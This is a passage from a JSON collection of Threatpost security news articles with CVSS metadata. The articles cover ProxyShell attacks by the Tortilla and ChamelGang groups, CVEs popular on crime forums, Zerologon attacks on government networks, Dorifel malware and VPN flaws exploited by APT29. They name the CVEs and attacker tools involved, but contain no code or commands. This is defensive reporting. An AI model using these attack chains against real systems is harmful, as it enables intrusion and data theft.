Ingredients in Tortilla\u2019s Infrastructure\n\nBesides the pastebin.pl site that hosts Tortilla\u2019s intermediate unpacker code, Tortilla\u2019s infrastructure also includes a Unix-based download server.\n\nThe site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the [AgentTesla trojan](<https://threatpost.com/agent-tesla-microsoft-asmi/163581/>) and the [FormBook malware dropper.](<https://threatpost.com/new-formbook-dropper-harbors-persistence/145614/>)\n\n## Babuk\u2019s Code Spill Helps Newbies\n\nIn July, Babuk gang\u2019s source code and builder were spilled: They were [uploaded to VirusTotal](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>), making it available to all security vendors and competitors. That leak has helped the ransomware spread to even an inexperienced, green group like Tortilla, Cisco Talos said.\n\nThe leak \u201cmay have encouraged new malicious actors to manipulate and deploy the malware,\u201d researchers noted.\n\n\u201cThis actor has only been operating since early July this year and has been experimenting with different payloads, apparently in order to obtain and maintain remote access to the infected systems,\u201d according to its writeup.\n\nWith Babuk source code readily available, all the Tortilla actors have to know is how to tweak it a tad, researchers said: A scenario that observers predicted back when the code appeared.\n\n\u201cThe actor displays low to medium skills with a decent understanding of the security concepts and the ability to create minor modifications to existing malware and offensive security tools,\u201d Cisco Talos researchers said in assessing the Tortilla gang.\n\n## Decryptor Won\u2019t Work on Variant\n\nWhile a free [Babuk decryptor was released](<https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/>) last week, it won\u2019t work on the Babuk variant seen in this campaign, according to the writeup: \u201cUnfortunately, it is only effective on files encrypted with a number of leaked keys and cannot be used to decrypt files encrypted by the variant described in this blog post.\u201d\n\n## How to Keep Exchange Safe\n\nTortilla is hosting malicious modules and conducting internet-wide scanning to exploit vulnerable hosts.\n\nThe researchers recommended staying vigilant, staying on top of any infection in its early stages and implementing a layered defense security, \u201cwith the behavioral protection enabled for endpoints and servers to detect the threats at an early stage of the infection chain.\u201d\n\nThey also recommended keeping servers and apps updated so as to squash vulnerabilities, such as the trio of CVEs exploited in the ProxyShell attacks.\n\nAlso, keep an eye out for backup demolition, as the code deletes shadow copies: \u201cBabuk ransomware is nefarious by its nature and while it encrypts the victim\u2019s machine, it interrupts the system backup process and deletes the volume shadow copies,\u201d according to Cisco Talos.\n\nOn top of all that, bolster detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, according to Cisco Talos.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-03T18:16:37", "type": "threatpost", "title": "\u2018Tortilla\u2019 Wraps Exchange Servers in ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-43267"], "modified": "2021-11-03T18:16:37", "id": "THREATPOST:52923238811C7BFD39E0529C85317249", "href": "https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-01T12:44:45", "description": "A new APT group has emerged that\u2019s specifically targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server\u2019s [ProxyShell](<https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>) and leveraging both new and existing malware to compromise networks.\n\nResearchers at security firm [Positive Technologies](<https://www.ptsecurity.com/ww-en/>) have been tracking the group, dubbed ChamelGang for its chameleon-like capabilities, since March. Though attackers mainly have been seen targeting Russian organizations, they have attacked targets in 10 countries so far, researchers said in a [report](<https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/>) by company researchers Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov and Stanislav Rakovsky published online Thursday.\n\nTo avoid detection, ChamelGang hides its malware and network infrastructure under legitimate services of established companies like Microsoft, TrendMicro, McAfee, IBM and Google in a couple of unique ways, researchers observed.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOne is to acquire domains that imitate their legitimate counterparts \u2013 such as newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com and mcafee-upgrade.com. The other is to place SSL certificates that also imitate legitimate ones \u2013 such as github.com, www.ibm.com, jquery.com, update.microsoft-support.net \u2013 on its servers, researchers said.\n\nMoreover, ChamelGang \u2013 like [Nobelium](<https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/>) and [REvil](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) before it \u2013 has hopped on the bandwagon of attacking the supply chain first to gain access to its ultimate target, they said. In one of the cases analyzed by Positive Technologies, \u201cthe group compromised a subsidiary and penetrated the target company\u2019s network through it,\u201d according to the writeup.\n\nThe attackers also appear malware-agnostic when it comes to tactics, using both known malicious programs such as [FRP](<https://howtofix.guide/frp-exe-virus/>), [Cobalt Strike Beacon](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), and Tiny Shell, as well as previously unknown malware ProxyT, BeaconLoader and the DoorMe backdoor, researchers said.\n\n## **Two Separate Attacks**\n\nResearchers analyzed two attacks by the novel APT: one in March and one in August. The first investigation was triggered after a Russia-based energy company\u2019s antivirus protection repeatedly reported the presence of the Cobalt Strike Beacon in RAM.\n\nAttackers gained access to the energy company\u2019s network through the supply chain, compromising a vulnerable version of a subsidiary company\u2019s web application on the JBoss Application Server. Upon investigation, researchers found that attackers exploited a critical vulnerability, [CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>), to remotely execute commands on the host.\n\nOnce on the energy company\u2019s network, ChamelGang moved laterally, deploying a number of tools along the way. They included Tiny Shell, with which a UNIX backdoor can receive a shell from an infected host, execute a command and transfer files; an old DLL hijacking technique associated with the Microsoft Distributed Transaction Control (MSDTC) Windows service to gain persistence and escalate privileges; and the Cobalt Strike Beacon for calling back to attackers for additional commands.\n\nResearchers were successful in accessing and exfiltrating data in the attack, researchers said. \u201cAfter collecting the data, they placed it on web servers on the compromised network for further downloading \u2026 using the Wget utility,\u201d they wrote.\n\n## **Cutting Short a ProxyShell Attack **\n\nThe second attack was on an organization from the Russian aviation production sector, researchers said. They notified the company four days after the server was compromised, working with employees to eliminate the threat shortly after.\n\n\u201cIn total, the attackers remained in the victim\u2019s network for eight days,\u201d researchers wrote. \u201cAccording to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.\u201d\n\nIn this instance, ChamelGang used a known chain of vulnerabilities in Microsoft Exchange called ProxyShell \u2013 CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 \u2013 to compromise network nodes and gain a foothold. Indeed, a number of attackers took advantage of ProxyShell throughout August, [pummeling](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) unpatched Exchange servers with attacks after a [researcher at BlackHat revealed](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) the attack surface.\n\nOnce on the network, attackers then installed a modified version of the backdoor DoorMe v2 on two Microsoft Exchange mail servers on the victim\u2019s network. Attackers also used BeaconLoader to move inside the network and infect nodes, as well as the Cobalt Strike Beacon.\n\n## **Victims Across the Globe**\n\nFurther threat intelligence following the investigation into attacks on the Russian companies revealed that ChamelGang\u2019s activity has not been limited to that country.\n\nPositive Technologies eventually identified 13 more compromised organizations in nine other countries \u2013 the U.S., Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. In the last four countries mentioned, attackers targeted government servers, they added.\n\nAttackers often used ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server against victims, who were all notified by the appropriate national security authorities in their respective countries.\n\nChamelGang\u2019s tendency to reach its targets through the supply chain also is likely one that it \u2013 as well as other APTs \u2013 will continue, given the success attackers have had so far with this tactic, researchers added. \u201cNew APT groups using this method to achieve their goals will appear on stage,\u201d they said.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-01T12:36:25", "type": "threatpost", "title": "New APT ChamelGang Targets Russian Energy, Aviation Orgs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-01T12:36:25", "id": "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "href": "https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:28", "description": "While much of the world was focused yesterday on the [Gauss malware](<https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/>) saga, there was another interesting infection happening, mainly in the Netherlands, that researchers think may be related to the [Zeus](<https://threatpost.com/zeus-source-code-leaked-051011/>) and [Citadel](<https://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>) attacks, though the motivation behind the attack is somewhat of a mystery. The new malware, called Dorifel, has infected thousands of businesses in the Netherlands and Europe and researchers say that it\u2019s stealing online banking data and the crew behind it may be working on some other attack campaigns, as well.\n\nDorifel is being distributed through phishing emails with a link, which, when clicked, will take the user to a site from which a binary is downloaded. The malware then downloads a secondary component that encrypts the files on the infected machine. This is the kind of behavior that one might expect from a piece of ransomware, such as [Reveton](<https://threatpost.com/reveton-ransomware-uses-fake-fbi-message-extort-money-080912/>), but there is no demand for payment from the victim. The malware also will look for network shares and then attempt to encrypt files found on those, as well.\n\nResearchers looking at the Dorifel infections found that, aside from the odd concentration of infections in the Netherlands, there are a couple of other odd components to the attack campaign. [David Jacoby](<https://www.securelist.com/en/blog/208193776/Dorifel_is_much_bigger_than_expected_and_it_s_still_active_and_growing>), a malware researcher at Kaspersky Lab, traced the malware back to the hosting servers, and found that not only was Dorifel being hosted on there, there also were several other pieces of malware being hosted on those boxes, along with a lot of stolen financial information.\n\n\u201cThis is a very strong indication that the gang behind the Dorifel malware was also doing some other really nasty scams. We were also able to download other samples of various malware which is still being investigated by the malware analysts at Kaspersky Lab,\u201d Jacoby said.\n\nAlong with the stolen financial data, which included credit card numbers, CVVs and victims\u2019 names, the servers also contained exploits for a pair of Java vulnerabilities. One of those flaws, [CVE-2012-0507](<https://threatpost.com/volume-malware-targeting-java-cve-2012-1723-flaw-spikes-080312/>), has been used in a variety of targeted attacks and other malware campaigns. \n\nAnalysts at [Fox-IT](<http://blog.fox-it.com/2012/08/09/xdoccryptdorifel-document-encrypting-and-network-spreading-virus/>) looked at the malware and attack techniques and saw indications that the attack may be somehow related to the Zeus and Citadel malware.\n\n\u201cThe big question is of course, what is the purpose of this Trojan, one might suspect it is ransomware, but without a ransom note I guess that would be a no go. The fact that it infects shares means that it will spread to other systems that open the infected \u2018documents\u2019 on a share. Additionally HTTP based connection functionality suggests that the Trojan has additional download tasks and likely executes additional payloads on systems that have been infected. Given the Modus Operandi of this operation, it is likely that it downloads the Citadel Trojan and this entire attack was just to increase the size of the botnet through spreading of network shares. Currently however there appears to be no task defined and no additional malware is downloaded,\u201d the company said in its analysis.\n\nJacoby saw some of the same indications in his research, as well, but nothing completely definitive about the link between Dorifel and Zeus or Citadel.\n\n\u201cAs mentioned before, we did find some interesting financial information, which could be an indication that this malware scam is related to for example ZeuS/Citadel, but since we have not yet identified any malware related to ZeuS/Citadel we cannot confirm it. All we can confirm is that the same server does store stolen financial information. We are still investigating this,\u201d he said.\n\nThe large majority of the infections from Dorifel have been found in the Netherlands so far, but there also are infected machines in other European countries, including Denmark, and a handful in the United States, too.\n", "cvss3": {}, "published": "2012-08-10T14:24:54", "type": "threatpost", "title": "Dorifel Malware Encrypts Files, Steals Financial Data, May Be Related to Zeus or Citadel", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723"], "modified": "2015-04-13T17:37:40", "id": "THREATPOST:427F2EA5BAE6D1C835F7B049DD5D6D27", "href": "https://threatpost.com/dorifel-malware-encrypts-files-steals-financial-data-may-be-related-zeus-or-citadel-081012/76900/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed 